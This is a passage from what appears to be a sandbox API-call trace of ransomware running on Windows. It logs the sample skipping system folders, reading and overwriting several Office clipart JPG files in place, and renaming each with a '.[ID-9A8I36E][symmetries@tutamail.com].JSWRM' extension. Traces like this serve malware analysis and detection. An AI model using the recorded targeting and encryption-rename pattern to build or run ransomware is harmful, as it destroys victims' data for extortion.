lstrcmpiW (lpString1="J0174952.JPG", lpString2="perflogs") returned -1 [0086.045] lstrcmpiW (lpString1="J0174952.JPG", lpString2="documents and settings") returned 1 [0086.045] lstrcmpiW (lpString1="J0174952.JPG", lpString2="$RECYCLE.BIN") returned 1 [0086.045] lstrcmpiW (lpString1="J0174952.JPG", lpString2="system volume information") returned -1 [0086.045] lstrcmpiW (lpString1="J0174952.JPG", lpString2="msocache") returned -1 [0086.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0086.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0174952.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0174952.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0174952.JPG", lpUsedDefaultChar=0x0) returned 12 [0086.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0086.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0086.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0174952.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0174952.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0174952.JPG", lpUsedDefaultChar=0x0) returned 12 [0086.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0086.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0086.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0086.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0086.045] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174952.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0174952.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.046] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=24982) returned 1 [0086.046] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.046] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6190) returned 0x24d210 [0086.046] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x6190, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x6190, lpOverlapped=0x0) returned 1 [0086.049] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.049] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x6190, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x6190, lpOverlapped=0x0) returned 1 [0086.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0086.049] CloseHandle (hObject=0x314) returned 1 [0086.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0086.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0086.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0086.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0086.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0086.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0086.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0086.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0086.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0086.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0086.050] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174952.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0174952.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174952.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0174952.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0086.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0086.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0086.050] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeac9c22, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeac9c22, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeac9c22, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb57d, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0175361.JPG", cAlternateFileName="")) returned 1 [0086.051] lstrcmpiW (lpString1="J0175361.JPG", lpString2=".") returned 1 [0086.051] lstrcmpiW (lpString1="J0175361.JPG", lpString2="..") returned 1 [0086.051] lstrcmpiW (lpString1="J0175361.JPG", lpString2="...") returned 1 [0086.051] lstrcmpiW (lpString1="J0175361.JPG", lpString2="windows") returned -1 [0086.051] lstrcmpiW (lpString1="J0175361.JPG", lpString2="recovery") returned -1 [0086.051] lstrcmpiW (lpString1="J0175361.JPG", lpString2="perflogs") returned -1 [0086.051] lstrcmpiW (lpString1="J0175361.JPG", lpString2="documents and settings") returned 1 [0086.051] lstrcmpiW (lpString1="J0175361.JPG", lpString2="$RECYCLE.BIN") returned 1 [0086.051] lstrcmpiW (lpString1="J0175361.JPG", lpString2="system volume information") returned -1 [0086.051] lstrcmpiW (lpString1="J0175361.JPG", lpString2="msocache") returned -1 [0086.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0086.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0175361.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0175361.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0175361.JPG", lpUsedDefaultChar=0x0) returned 12 [0086.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0086.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0086.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0175361.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0175361.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0175361.JPG", lpUsedDefaultChar=0x0) returned 12 [0086.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0086.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0086.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0086.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0086.051] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0175361.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0175361.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.052] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=46461) returned 1 [0086.052] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.052] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb570) returned 0x24d210 [0086.052] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xb570, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xb570, lpOverlapped=0x0) returned 1 [0086.057] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.057] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xb570, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xb570, lpOverlapped=0x0) returned 1 [0086.057] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0086.058] CloseHandle (hObject=0x314) returned 1 [0086.058] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0086.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.058] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0086.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.058] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0086.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0086.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.058] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0086.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0086.058] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0086.058] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0086.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0086.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0086.058] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0175361.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0175361.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0175361.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0175361.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.059] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0086.059] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0086.059] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0086.059] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeac9c22, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeac9c22, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeac9c22, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x38d8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0175428.JPG", cAlternateFileName="")) returned 1 [0086.059] lstrcmpiW (lpString1="J0175428.JPG", lpString2=".") returned 1 [0086.059] lstrcmpiW (lpString1="J0175428.JPG", lpString2="..") returned 1 [0086.059] lstrcmpiW (lpString1="J0175428.JPG", lpString2="...") returned 1 [0086.059] lstrcmpiW (lpString1="J0175428.JPG", lpString2="windows") returned -1 [0086.059] lstrcmpiW (lpString1="J0175428.JPG", lpString2="recovery") returned -1 [0086.059] lstrcmpiW (lpString1="J0175428.JPG", lpString2="perflogs") returned -1 [0086.059] lstrcmpiW (lpString1="J0175428.JPG", lpString2="documents and settings") returned 1 [0086.059] lstrcmpiW (lpString1="J0175428.JPG", lpString2="$RECYCLE.BIN") returned 1 [0086.059] lstrcmpiW (lpString1="J0175428.JPG", lpString2="system volume information") returned -1 [0086.059] lstrcmpiW (lpString1="J0175428.JPG", lpString2="msocache") returned -1 [0086.059] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0086.059] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0175428.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.059] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0175428.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0175428.JPG", lpUsedDefaultChar=0x0) returned 12 [0086.059] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0086.059] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0086.060] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0175428.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.060] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0175428.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0175428.JPG", lpUsedDefaultChar=0x0) returned 12 [0086.060] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0086.060] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0086.060] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0086.060] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.060] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.060] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0086.060] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0175428.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0175428.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.061] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=14552) returned 1 [0086.061] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.061] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x38d0) returned 0x24d210 [0086.061] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x38d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x38d0, lpOverlapped=0x0) returned 1 [0086.152] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.152] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x38d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x38d0, lpOverlapped=0x0) returned 1 [0086.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0086.152] CloseHandle (hObject=0x314) returned 1 [0086.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0086.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0086.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0086.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0086.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0086.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0086.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0086.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0086.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0086.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0086.153] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0175428.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0175428.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0175428.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0175428.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0086.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0086.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0086.154] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeac9c22, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeac9c22, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeac9c22, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb12e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0177257.JPG", cAlternateFileName="")) returned 1 [0086.154] lstrcmpiW (lpString1="J0177257.JPG", lpString2=".") returned 1 [0086.154] lstrcmpiW (lpString1="J0177257.JPG", lpString2="..") returned 1 [0086.154] lstrcmpiW (lpString1="J0177257.JPG", lpString2="...") returned 1 [0086.154] lstrcmpiW (lpString1="J0177257.JPG", lpString2="windows") returned -1 [0086.154] lstrcmpiW (lpString1="J0177257.JPG", lpString2="recovery") returned -1 [0086.154] lstrcmpiW (lpString1="J0177257.JPG", lpString2="perflogs") returned -1 [0086.154] lstrcmpiW (lpString1="J0177257.JPG", lpString2="documents and settings") returned 1 [0086.154] lstrcmpiW (lpString1="J0177257.JPG", lpString2="$RECYCLE.BIN") returned 1 [0086.154] lstrcmpiW (lpString1="J0177257.JPG", lpString2="system volume information") returned -1 [0086.154] lstrcmpiW (lpString1="J0177257.JPG", lpString2="msocache") returned -1 [0086.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0086.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0177257.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0177257.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0177257.JPG", lpUsedDefaultChar=0x0) returned 12 [0086.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0086.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0086.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0177257.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0177257.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0177257.JPG", lpUsedDefaultChar=0x0) returned 12 [0086.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0086.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0086.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0086.155] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", 